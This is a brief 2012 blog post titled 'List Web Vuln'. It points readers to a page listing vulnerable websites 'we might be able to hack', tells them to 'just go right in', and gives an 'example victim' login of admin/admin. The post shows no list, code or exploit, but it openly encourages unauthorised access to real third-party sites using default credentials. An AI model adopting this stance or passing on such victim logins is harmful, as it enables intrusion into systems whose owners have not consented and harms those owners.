Thursday, 14 June 2012

List Web Vuln


This blog has a page that provides vulnerable websites that we might be able to hack.

Update 15/06/2012

Just go right in.


Later, if I come across a new and still-fresh list, I will update this.

My example victim:

username : admin
Password : admin

